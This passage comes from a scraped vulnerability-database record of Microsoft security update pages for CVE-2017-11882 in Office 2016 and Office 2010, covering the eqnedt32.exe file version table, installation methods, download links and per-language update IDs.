size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1025</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1026</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1028</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1029</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1030</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1031</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1032</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1035</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1036</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1037</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1038</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1040</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1041</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1042</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1043</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1044</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1045</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1046</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1048</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1049</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1050</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1051</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1053</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1054</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1055</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1057</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1058</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1060</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1061</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1062</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1063</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1066</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1081</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1086</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1087</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2070</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2074</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_3082</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_9242</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>25-Oct-17</td><td>01:26</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T06:49:45", "id": "KB4011262", "href": "https://support.microsoft.com/en-us/help/4011262/", "published": "2017-11-14T00:00:00", "title": "Description of the security update for Office 2016: November 14, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:47:19", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for Office 2010: November 28, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2687455\">Service Pack 2 for Office 2010</a> installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" target=\"_blank\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.<br/><br/><strong>Note</strong>: Separate updates are provided for each Office language. See the table later in this section for the list of languages and update IDs.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011618\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a> website.<br/><br/><strong>Note</strong>: Separate updates are provided for each Office language. See the table later in this section for the list of languages and update IDs.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=2237ed4a-a190-40bf-89a7-13670cf5b174\" managed-link=\"\" target=\"\">Download\u00a0security update 4011618 for the 32-bit version of Office 2010</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=6b5ef0f1-7ac5-4669-a063-69dfb6de2d07\" managed-link=\"\" target=\"\">Download security update 4011618 for the 64-bit version of Office 2010</a></li></ul><p>\u00a0</p><p>The following language versions are available for Office 2010:</p><table class=\"table\"><tbody><tr><td width=\"131\"><p><strong>Language</strong><strong><span lang=\"EN-US\"></span></strong></p></td><td width=\"100\"><p><strong>Platform</strong><strong><span lang=\"EN-US\"></span></strong></p></td><td width=\"494\"><p><strong>Microsoft Update ID</strong><strong><span lang=\"EN-US\"></span></strong></p></td></tr><tr><td width=\"131\"><p>ar-SA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6f4af645-ca7b-4c70-bd86-ccf60e308f40<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>bg-BG<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>1fa89a33-e3c9-45dc-9c49-b6e32c04a92d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>cs-CZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>230e7994-d7cc-46c2-b03c-6ebc9b848d04<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>da-DK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>b49256d5-93f6-4a9c-b1da-ecdd5fc5d03a<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>de-DE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>eab2a5d4-6940-4356-ad51-90e2f102d2c8<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>el-GR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>2add0785-3c50-438d-8018-6f600cdeed7f<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>en-US<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c9e35b51-a722-478a-92c5-90fed2890414<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>es-ES<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>51761170-e2cc-4de5-a45b-56b47d758e37<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>et-EE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>2b8f54d0-e240-48f5-aa06-421652339325<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fi-FI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>762b1b94-04dd-4132-8a33-f8c9a1766145<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fr-FR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>320ebf2c-7942-42de-b6db-0aeaebf8e910<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>he-IL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f683af7a-78d6-43ec-a5fc-9ac9225121d8<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hi-IN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>a188be9c-fd73-4060-8e0b-dfce8cdc9074<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hr-HR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>71aec5fe-94a9-415f-b84a-d968000140ce<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hu-HU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>90b678dd-ae26-49dd-b69a-342669b1a608<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>it-IT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>dea99bd7-6e0c-4806-8d75-2163dd920efd<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ja-JP<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>99b7623f-b914-4595-a7b1-7381c4ebb586<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>kk-KZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f6040da2-09b9-4f96-8bf3-845bec77b548<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ko-KR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6dcbe074-d9b2-4e03-9108-a0d8b3823f36<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lt-LT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>408f8ca0-f176-4409-836b-29e57a4e680a<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lv-LV<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>0f435635-25e3-47a3-bed3-020f15f39604<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nb-NO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>aa939807-28b7-4223-b6eb-4283ca3fc54b<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nl-NL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c4ce6005-0dde-4e84-90bf-bfe35c35c518<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pl-PL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c93a4c7c-2355-4e63-ba2a-f92b60fc2924<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-BR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f4fb7d4e-6756-4811-a326-c07c241e1601<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-PT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>19ea1954-00f5-49c2-9b15-a4435c71472d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ro-RO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>209bebf7-f2aa-463c-9b77-689fbf4b9ae0<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ru-RU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>d539139d-1e2a-46d9-865f-688d871e59d0<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sk-SK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>acf97ed5-c4f6-4543-8c2d-9a0c22043fef<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sl-SI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>5727f9ab-b034-48ba-a6ed-d80dbc45b4d1<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sr-Latn-CS<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>13a2149a-4d3a-4f59-a325-0f240814c719<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sv-SE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ed9cfead-3901-4bd4-b9b8-68c7d3f331e9<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>th-TH<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>319c6026-f7ed-480f-83ad-76da45f833b4<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>tr-TR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6e6d0e8c-fdf4-4b23-8473-5e15d20f35d6<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>uk-UA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>d810c62b-72b1-489a-a569-7393d108febc<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-CN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>8d4c4708-d10c-4cb1-82a8-7872d5b42520<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-TW<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>89d72c6f-7b60-4bd1-b0e3-991b74e40faf<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ar-SA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>36e0cc27-377b-41e7-9345-c7018a2ea25a<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>bg-BG<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>fc2aa7b3-f147-4120-8205-27dc9c0fc745<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>cs-CZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>0188c2ec-0f53-469c-8f71-5afd6bfc8461<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>da-DK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ab62f1ba-14f8-48f8-9779-4626e6851b09<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>de-DE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>5457fc20-78aa-498a-b7e9-1d033ece4a81<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>el-GR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>40bd218a-a1b1-47fd-b80b-13db51b826c5<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>en-US<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>8b8bd360-565e-48c6-a7ab-849048149845<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>es-ES<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>8a9c7e26-92e5-4c50-98c0-96e8cab913c9<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>et-EE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6fecdcd7-ef63-4824-a9a1-44153e6b3399<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fi-FI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ead0472a-6145-4806-994e-2ea15e5655d3<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fr-FR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>44a6c00d-fdb7-479a-b6de-32f2029fb4f6<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>he-IL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>df8c5dd6-e7df-46f6-bab1-e8b27554284d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hi-IN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>26900c32-1600-45b7-9215-17ff44b3b4fc<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hr-HR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>a2c657a0-4938-40cc-a569-3cab8e1e000e<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hu-HU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>13fc8588-812c-4f12-814b-c252a325fcbf<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>it-IT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>52af3113-2633-4781-94e4-b5fee8b0eb23<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ja-JP<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>48a9a078-c385-468a-bd33-f0c397a24777<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>kk-KZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>d911089c-28b6-48ab-8ba2-247e0cf5e4c1<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ko-KR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>e9a36679-bcfe-46c1-a1bb-752118602311<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lt-LT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>eee1039c-c663-433d-a207-2729201ba8b2<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lv-LV<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>5a940649-004c-4088-ad36-f7e3e377edea<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nb-NO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>aeec1521-1a02-4ec0-a05c-ea477b1393a0<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nl-NL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>14724059-aa26-4a10-ba95-60d1b8790391<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pl-PL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>858e443d-5815-4572-8f6e-d0b5aef379fb<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-BR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>61393309-f339-4388-b666-d2d21d70b278<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-PT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>da13e485-b8cc-4dbf-a294-d8427ab6b2c3<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ro-RO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f7a7a0c9-1e6d-4c7a-a376-81a7fd854d26<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ru-RU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>242f6092-a5fe-4cef-8e52-c90afe35b079<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sk-SK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>bd672718-7e54-4af1-9d58-7e2c19472a68<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sl-SI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>690ab4eb-8323-43e4-a262-46c2bb4efd71<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sr-Latn-CS<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>082c5509-c18f-4dbb-bbc2-df45363abf1d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sv-SE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f96bc680-fcc5-4900-88c4-a66412cf615b<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>th-TH<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c8b92cdc-be78-4958-801f-09a74953d83c<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>tr-TR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f2cc89c9-f7ce-416f-bac2-ea3111ed2425<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>uk-UA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>457a68f8-ea5a-4319-9ac3-19f1d2afad58<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-CN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ecd2446d-f25b-4269-9d7f-71b786e68ff1<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-TW<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td 